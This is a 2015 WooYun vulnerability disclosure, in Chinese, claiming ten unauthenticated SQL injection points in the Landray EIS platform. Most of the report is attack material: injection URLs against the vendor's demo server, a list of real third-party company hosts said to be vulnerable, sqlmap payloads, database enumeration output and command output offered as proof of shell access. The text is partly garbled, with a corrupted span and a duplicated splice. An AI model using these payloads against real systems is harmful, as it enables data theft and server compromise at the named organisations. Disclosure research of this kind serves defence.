当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111278

漏洞标题:蓝凌EIS智慧协同平台sql注入+getshell10处打包(demo测试,无需登录)

相关厂商:深圳市蓝凌软件股份有限公司

漏洞作者: 路人甲

提交时间:2015-05-04 17:35

修复时间:2015-06-18 17:36

公开时间:2015-06-18 17:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

官网demo:eisdemo.landray.com.cn

0x1:
http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
0x2:
http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=1'
0x3:
http://eisdemo.landray.com.cn/webdoc/HtmlSignatureServer.aspx?DocumentID=1'&SignatureID=1&Signature=1&COMMAND=SHOWSIGNATURE
0x4:
http://eisdemo.landray.com.cn/vote/service.aspx
post:action=voteid&ID=1'
0x5:
http://eisdemo.landray.com.cn/sm/bulkinsert_data.aspx?id=1'
0x6
http://eisdemo.landray.com.cn/sm/data_manager_right_edit.aspx?tableid=1'
0x7:
http://eisdemo.landray.com.cn/sm/DictKey.aspx?DictKey=1'
0x8:
http://eisdemo.landray.com.cn/sm/menu_define.aspx?id=1 and 1=(select @@version)
0x9:
http://eisdemo.landray.com.cn/sm/menu_emp_edit.aspx?ID=(select @@version)
0x10:
http://eisdemo.landray.com.cn/sm/menu_left_edit.aspx?post:action=dragdrop&id=1&parent_id=1 where 1=(select @@version)--


部分案例:
http://oa.hejiangroup.com//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
http://maofugroup.com:8111//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
http://oa.myzygroup.com//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
http://oa.aixiangqin.com.cn:88//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
http://oa.hejiangroup.com//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
http://oa.geheng.com:800//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
http://oa.aixiangqin.com.cn:88//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
http://maofugroup.com:8111//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
http://eis.landray.com.cn/

漏洞证明:

http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
加单引号返回:
“/”应用程序中的服务器错误。
字符串 '19e789719ac343679c070110c147290e'' 后的引号不完整。
'19e789719ac343679c070110c147290e'' 附近有语法错误。
说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.Data.SqlClient.SqlException: 字符串 '19e789719ac343679c070110c147290e'' 后的引号不完整。
'19e789719ac343679c070110c147290e'' 附近有语法错误。
源错误:
执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。
http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=(select%20@@version)
“/”应用程序中的服务器错误。
在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
Jun 28 2012 08:36:30
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
' 转换成数据类型 int 时失败。
说明: 执行当前 Web 请求期间,出现未经处理的异常。请�ND error-based - WHERE or HAVING clause
Payload: id=1 AND 3419=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (3419=3419) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(103)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (4391=4391) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5, Microsoft Share Point 15.0.0.4420
back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] EISdemo
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] Search_Service_Application_AnalyticsReportingStoreDB_a40959bae29942a9997792ecfb09122a
[*] Search_Service_Application_CrawlStoreDB_4e7a0e760e424a92ab601663836678a6
[*] Search_Service_Application_DB_3ea5977f6e4b4
1348
6117)+CHAR(113)+(SELECT (CASE WHEN (4391=4391) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5, Microsoft Share Point 15.0.0.4420
back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] EISdemo
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] Search_Service_Application_AnalyticsReportingStoreDB_a40959bae29942a9997792ecfb09122a
[*] Search_Service_Application_CrawlStoreDB_4e7a0e760e424a92ab601663836678a6
[*] Search_Service_Application_DB_3ea5977f6e4b46dc8e12ccaf6aebd519
[*] Search_Service_Application_LinksStoreDB_7f7c2ee474204a4b9b5773950b8735e2
[*] SharePoint_AdminContent_8d9aeb53-99b7-4c74-8e2f-133b2728da14
[*] SharePoint_Config
[*] tempdb
[*] WSS_UsageApplication
command standard output:
---
\\WIN-K56VKIJLEMJ 的用户帐户

-------------------------------------------------------------------------------
Administrator \?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0Guest \?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0krbtgt \?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0
---
getshell了吧

修复方案:

厂商懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)